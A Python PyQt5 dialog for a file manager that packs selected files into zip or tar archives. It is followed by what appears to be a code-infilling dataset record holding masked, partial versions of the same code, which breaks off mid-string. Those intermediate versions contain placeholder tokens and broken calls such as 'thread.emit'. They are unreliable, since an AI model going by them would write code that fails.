__author__ = 'piotrek'

import os
import zipfile
import tarfile

from PyQt5 import QtWidgets
from PyQt5 import QtGui
from PyQt5 import QtCore

from Widgets.list_view import ListView
from Threads.PackThread import PackThread


class CreateArchive(QtWidgets.QDialog):
    """Modal dialog that packs selected files/directories into a .zip or
    .tar archive on a worker thread."""

    def __init__(self, model, index, path, parent=None):
        super().__init__(parent)
        self.setWindowTitle('Utworz archiwum')  # 'Create archive'
        self.setWindowModality(QtCore.Qt.WindowModal)
        self.resize(350, 400)

        self.path = path
        self.file_model = model
        self.index = index

        self.create_components()
        self.create_layout()

        self.pack_thread = PackThread()
        self.pack_thread.status_signal.connect(self.ended)
        self.pack_thread.progress_signal.connect(self.progress)
        self.pack_thread.access_signal.connect(self.access)

    def create_item(self, index):
        # Build a checkable list item mirroring the file's name and icon.
        path = os.path.abspath(self.file_model.filePath(index))
        item = QtGui.QStandardItem(os.path.basename(path))
        item.setIcon(self.file_model.fileIcon(index))
        item.setCheckable(True)
        item.setEditable(False)
        return item

    def create_components(self):
        self.option_widget = QtWidgets.QWidget()

        self.name_lbl = QtWidgets.QLabel('Nazwa')  # 'Name'
        self.name_edit = QtWidgets.QLineEdit('untitled')
        self.name_edit.setMaxLength(30)
        self.name_edit.setValidator(
            QtGui.QRegExpValidator(QtCore.QRegExp(r'\w{30}'), self.name_edit))

        self.archive_type_cb = QtWidgets.QComboBox()
        self.archive_type_cb.addItem('.zip')
        self.archive_type_cb.addItem('.tar')

        self.path_lbl = QtWidgets.QLabel(self.path)
        self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,
                                    QtWidgets.QSizePolicy.Preferred)
        self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.set_path)  # 'Path'

        self.file_list = ListView('Pliki do zapakowania')  # 'Files to pack'
        self.file_list.add_element(self.index)
        self.file_list.add_to_model(self.create_item(self.index))

        self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog', clicked=self.add_catalog)  # 'Add directory'
        self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=self.add_file)  # 'Add file'
        self.remove_selected_btn = QtWidgets.QPushButton(
            'Usun zaznaczone', clicked=self.file_list.remove_selected)  # 'Remove selected'

        self.progress_bar = QtWidgets.QProgressBar()
        self.progress_bar.setMinimum(0)

        self.progress_lbl = QtWidgets.QLabel()

        self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.pack_files)  # 'Pack'

    def set_path(self):
        path = QtWidgets.QFileDialog.getExistingDirectory(
            self, 'Wybierz katalog', QtCore.QDir.homePath())  # 'Choose directory'
        if path:
            self.path = path
            self.path_lbl.setText(self.path)

    def create_layout(self):
        option_layout = QtWidgets.QGridLayout()
        v_option_layout = QtWidgets.QVBoxLayout()

        main_layout = QtWidgets.QGridLayout()
        v_main_layout = QtWidgets.QVBoxLayout()

        h_name_layout = QtWidgets.QHBoxLayout()
        h_name_layout.addWidget(self.name_lbl)
        h_name_layout.addWidget(self.name_edit)
        h_name_layout.addWidget(self.archive_type_cb)

        v_option_layout.addLayout(h_name_layout)

        h_path_layout = QtWidgets.QHBoxLayout()
        h_path_layout.addWidget(self.path_lbl)
        h_path_layout.addWidget(self.set_path_btn)

        v_option_layout.addLayout(h_path_layout)

        v_option_layout.addWidget(self.file_list)

        h_remove_layout = QtWidgets.QHBoxLayout()
        h_remove_layout.addWidget(self.add_folder_btn)
        h_remove_layout.addWidget(self.add_file_btn)
        h_remove_layout.addWidget(self.remove_selected_btn)

        v_option_layout.addLayout(h_remove_layout)

        option_layout.addLayout(v_option_layout, 0, 0, 1, 1)

        self.option_widget.setLayout(option_layout)

        v_main_layout.addWidget(self.option_widget)
        v_main_layout.addWidget(self.progress_bar)
        v_main_layout.addWidget(self.pack_btn)

        main_layout.addLayout(v_main_layout, 0, 0, 1, 1)

        self.setLayout(main_layout)

    def pack_files(self):
        if not self.name_edit.text():
            return
        if not self.file_list.get_quantity():
            return
        self.option_widget.setEnabled(False)
        self.progress_bar.setMaximum(0)  # maximum 0 shows a busy indicator

        # archive name = typed name + extension picked in the combo box
        name = self.name_edit.text() + self.archive_type_cb.currentText()
        path = self.path_lbl.text()
        list_index = self.file_list.get_index_list()

        path_list = [self.file_model.filePath(index) for index in list_index]

        if self.archive_type_cb.currentText() == '.zip':
            self.pack_thread.set(pack_zip, name, path, path_list)
        elif self.archive_type_cb.currentText() == '.tar':
            self.pack_thread.set(pack_tar, name, path, path_list)

        self.pack_thread.start()

    def add_catalog(self):
        catalog = QtWidgets.QFileDialog.getExistingDirectory(
            self, 'Wybierz katalog', QtCore.QDir.homePath())
        if catalog and not QtCore.QFileInfo(catalog).isSymLink():
            index = self.file_model.index(catalog)
            if index not in self.file_list:
                self.file_list.add_element(index)
                self.file_list.add_to_model(self.create_item(index))

    def add_file(self):
        file, _filter = QtWidgets.QFileDialog.getOpenFileName(
            self, 'Wybierz plik', QtCore.QDir.homePath())  # 'Choose file'
        if file:
            index = self.file_model.index(file)
            if index not in self.file_list:
                self.file_list.add_element(index)
                self.file_list.add_to_model(self.create_item(index))

    def ended(self):
        self.parent().trayIcon.showMessage(
            'Zakonczono',  # 'Finished'
            'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.name),
            QtWidgets.QSystemTrayIcon.Information, 2000)
        self.pack_btn.setText('Zamknij')  # 'Close'
        self.progress_bar.setMaximum(1)
        self.progress_bar.setValue(1)
        self.pack_thread.terminate()
        self.pack_btn.clicked.connect(self.close)

    def access(self):
        self.setWindowTitle('Brak dostepu')  # 'Access denied'
        self.pack_btn.setText('Zamknij')
        self.progress_bar.setMaximum(1)
        self.progress_bar.setValue(1)
        self.pack_thread.terminate()
        self.pack_btn.clicked.connect(self.close)

    def progress(self, info):
        self.setWindowTitle(info)

    def closeEvent(self, event):
        # Refuse to close while the worker is still packing.
        if not self.pack_thread.ended:
            event.ignore()
            return
        self.parent().catalog_list.setRootIndex(self.parent().catalog_list.rootIndex())
        self.parent().catalog_list.scrollTo(self.parent().catalog_list.currentIndex())
        self.parent().model_list.refresh(self.parent().catalog_list.rootIndex())


def pack_tar(thread, name, target_path, path_list):
    tar_path = os.path.join(os.path.abspath(target_path), name)
    try:
        with tarfile.open(tar_path, 'w') as tar_file:
            for file_path in path_list:
                if not os.path.isdir(file_path):
                    thread.progress_signal.emit(file_path)
                    tar_file.add(file_path, arcname=os.path.basename(file_path))
                else:
                    # Archive the directory recursively, keeping entries
                    # relative to the directory's parent.
                    catalog_path = os.path.dirname(os.path.abspath(file_path))
                    for root_folder, subfolders, files in os.walk(file_path):
                        for file in files:
                            thread.progress_signal.emit(os.path.join(root_folder, file))
                            tar_file.add(os.path.join(root_folder, file),
                                         arcname=os.path.join(root_folder[len(catalog_path) + 1:], file))
    except IOError:
        thread.access_signal.emit()


def pack_zip(thread, name, target_path, path_list):
    zip_path = os.path.join(os.path.abspath(target_path), name)
    try:
        with zipfile.ZipFile(zip_path, 'w') as zip_file:
            for path_file in path_list:
                if not os.path.isdir(path_file):
                    thread.progress_signal.emit(path_file)
                    zip_file.write(path_file, arcname=os.path.basename(path_file))
                else:
                    path_folder = os.path.dirname(os.path.abspath(path_file))
                    for root_folder, subfolders, files in os.walk(path_file):
                        for file in files:
                            thread.progress_signal.emit(os.path.join(root_folder, file))
                            zip_file.write(os.path.join(root_folder, file),
                                           arcname=os.path.join(root_folder[len(path_folder) + 1:], file))
    except IOError:
        thread.access_signal.emit()
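# --- Added usage sketch (not part of the original module) -----------------
# pack_zip/pack_tar only need an object that duck-types PackThread's
# signals, so the packing logic can be exercised headlessly. FakeSignal
# and FakeThread below are hypothetical stand-ins, not classes of this app.
if __name__ == '__main__':
    import tempfile

    class FakeSignal:
        def __init__(self):
            self.emitted = []

        def emit(self, *args):
            self.emitted.append(args)

    class FakeThread:
        def __init__(self):
            self.progress_signal = FakeSignal()
            self.access_signal = FakeSignal()

    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, 'hello.txt')
        with open(src, 'w') as f:
            f.write('hello')

        fake = FakeThread()
        pack_zip(fake, 'out.zip', tmp, [src])

        with zipfile.ZipFile(os.path.join(tmp, 'out.zip')) as z:
            assert z.namelist() == ['hello.txt']
        print(fake.progress_signal.emitted)  # one tuple per packed file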
normal
{ "blob_id": "7a41826f65f2f55b4c678df2ac06027df6ca50d4", "index": 3623, "step-1": "<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n <mask token>\n <mask token>\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif 
self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n <mask token>\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n <mask token>\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n <mask token>\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n 
h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n <mask token>\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n <mask token>\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n\n def __init__(self, model, index, path, parent=None):\n super().__init__(parent)\n self.setWindowTitle('Utworz archiwum')\n self.setWindowModality(QtCore.Qt.WindowModal)\n self.resize(350, 400)\n self.path = path\n self.file_model = model\n self.index = index\n self.create_components()\n self.create_layout()\n self.pack_thread = PackThread()\n self.pack_thread.status_signal.connect(self.ended)\n self.pack_thread.progress_signal.connect(self.progress)\n self.pack_thread.access_signal.connect(self.access)\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def 
create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n\n def add_catalog(self):\n catalog = 
QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if catalog and not QtCore.QFileInfo(catalog).isSymLink():\n index = self.file_model.index(catalog)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def access(self):\n self.setWindowTitle('Brak dostepu')\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\ndef pack_tar(thread, name, target_path, path_list):\n tar_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with tarfile.open(tar_path, 'w') as tar_file:\n for file_path in path_list:\n if not os.path.isdir(file_path):\n thread.progress_signal.emit(file_path)\n tar_file.add(file_path, arcname=os.path.basename(file_path)\n )\n else:\n catalog_path = os.path.dirname(os.path.abspath(file_path))\n for root_folder, subfolders, files in os.walk(file_path):\n for file in files:\n thread.in_progress_signal.emit(os.path.join(\n root_folder, file))\n tar_file.add(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n catalog_path) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n\n\ndef pack_zip(thread, name, target_path, path_list):\n zip_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with zipfile.ZipFile(zip_path, 'w') as zip_file:\n for path_file in path_list:\n if not os.path.isdir(path_file):\n thread.progress_signal.emit(path_file)\n zip_file.write(path_file, arcname=os.path.basename(\n path_file))\n else:\n path_folder = os.path.dirname(os.path.abspath(path_file))\n for root_folder, subfolders, files in os.walk(path_file):\n for file in files:\n thread.emit(os.path.join(root_folder, file))\n zip_file.write(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n path_folder) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n", "step-4": "__author__ = 'piotrek'\n<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n\n def __init__(self, model, index, path, parent=None):\n super().__init__(parent)\n self.setWindowTitle('Utworz archiwum')\n self.setWindowModality(QtCore.Qt.WindowModal)\n self.resize(350, 400)\n self.path = path\n self.file_model = model\n self.index = index\n self.create_components()\n self.create_layout()\n self.pack_thread = PackThread()\n 
self.pack_thread.status_signal.connect(self.ended)\n self.pack_thread.progress_signal.connect(self.progress)\n self.pack_thread.access_signal.connect(self.access)\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = 
